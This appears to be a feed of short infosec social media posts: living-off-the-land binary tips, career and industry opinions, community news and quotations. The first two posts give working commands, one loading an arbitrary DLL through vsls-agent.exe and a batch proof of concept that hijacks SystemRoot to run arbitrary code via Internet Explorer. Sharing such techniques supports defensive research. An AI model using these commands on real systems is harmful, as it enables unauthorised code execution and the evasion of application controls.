The "Visual Studio Live Share" binary is a fun #LOLBIN to load an arbitrary DLL from the cmdline: vsls-agent.exe --agentExtensionPath c:\path\to\your.dll

Have you ever considered Internet Explorer to be a #lolbin? By navigating to URI: `shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}` you can spawn `rstrui.exe` (System Restore). If you modify the `SystemRoot` environment variable and copy over DLLs you can run whatever you like.

POC: mkdir %temp%\System32 FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL set a=C:\Windows\System32\calc.exe copy %a% %temp%\System32\rstrui.exe /Y > NUL set SystemRoot=%temp% start iexplore shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}

Good life lesson: Hurt people, hurt people. Took me awhile to not worry or care about the people that aren’t happy for others successes or for others positivity to help people or make a positive difference in others lives. They are the unhappy ones. I hope they find happiness.

Not saying I'm moving but just in case, I joined mastodon as: https://ioc[.]exchange/web/Conor Richard Anyone that I follow here or who follows me, I'd be happy to connect.

Intel 471 is deeply saddened by the tragic news of Vitali Kremez's untimely passing. We extend our deepest condolences to his family, friends and his Advance Intelligence Team during this challenging time.

Stealing passwords from infosec Mastodon - without bypassing CSP portswigger.net/research/steal…

This is bad. What about accounts of the deceased? Things that should remain part of the public record?

#LOLBAS hit 5000 stars on GitHub to bring in the New Year! Thank you all for the support over the years - it truly is a community project! Big shout out to Oddvar Moe🙏, Conor Richard, Chris Spehn, liam, Wietze, and Jose Enrique Hernandez for all the hard work to keep it going!

Be a perpetual student. Expertise is a snapshot in time that eventually fades away.

The leap that it takes to publicly share infosec knowledge/content is generally underappreciated. Often, folks who want to share with the community do not out of anxiety/fear of acceptance/etc. And then, there is the asymmetry of those who share offensive content vs defensive.

I guess the general points are: - We need more people to contribute to the profession - We need to encourage people to share (coaching and validation are acceptable) - The community that shares defensive content is smaller IMO. It would be great to see others in this space

Justin Elze Some immature companies (ex; no SIEM or whatever) tend to go for RTs before PTs for leverage. mainly to get management to take a seat in the same room, listen, and take security more seriously ($$$).

Once men turned their thinking over to machines in the hope that this would set them free. But that only permitted other men with machines to enslave them.

Priorities are not what you say, they are what you fund. Culture is not what you say, it's what you reward. Action is a lie detector.

Technically unemployed for a few days. New adventures await starting Monday!

Show me a person who blames the EDR, and 9.9 times out of 10 I'll show you someone who doesn't understand: DNS FW rules Noisy Dev jobs GPO Gapping Bad config Scanners You need something on your endpoints that auto-blocks crud, but you still have to fix your internal problems.

Repeat after me: vulnerability management is not incident response. We see an RCE a week, why do we randomly select a few to be OMGTHISBAD and scramble? All those other RCEs being discriminated are sad... and still popping you.

I love detection engineering, I think it is awesome and hugely needed, and its the future and all that. But I have no idea how to talk about it to a team of 1 (ONE) running a SIEM ...

Well well! Microsoft removed the Windows version checks to use AppLocker! Everyone can now use AppLocker! support.microsoft.com/en-us/topic/kb…